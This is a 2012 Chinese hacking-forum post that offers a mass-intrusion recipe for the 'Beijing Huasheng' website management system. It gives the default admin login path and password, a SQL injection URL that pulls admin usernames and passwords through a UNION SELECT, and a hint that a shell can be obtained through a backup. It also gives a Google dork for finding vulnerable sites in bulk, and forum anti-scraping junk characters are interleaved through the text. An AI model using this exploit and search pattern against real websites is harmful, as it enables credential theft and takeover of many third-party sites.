中国网络渗透测试联盟
标题: 批量入侵 北京华盛网站管理系统 注入漏洞 [打印本页]
作者: 荒村狂客 时间: 2012-9-5 20:19
标题: 批量入侵 北京华盛网站管理系统 注入漏洞
默认后台:admin/Login.asp
' U2 L5 l8 X G2 \1 \7 c默认密码:admin 123456
/ u$ s8 C1 P" Q! [& O2 L1 P; B0 E( ?# f$ `" w' }6 M( @
exp:
9 l2 |. F2 a6 R: a/ khttp://www.xxxxx.com/show_pt.asp?id=1568 and 1=2 union select 1,password,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
9 K8 ]- s# ]" T0 g+ C( O
) f' M! ~: w1 J" Z0 _* e注:错误会返回主页。如字段不对,自行构造!拿shell有备份。
6 `/ i7 H5 G" C* y* {2 b
( s9 D0 h0 k0 h$ @
7 N% j$ l6 z0 g5 R0 J8 d4 e2 [8 jgoogle批量关键词 inurl:show_pt.asp?id= 【页面收藏】网站地图
作者: 浪子 时间: 2012-9-8 09:51
看帖不回是不道德滴。。
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) |
Powered by Discuz! X3.2 |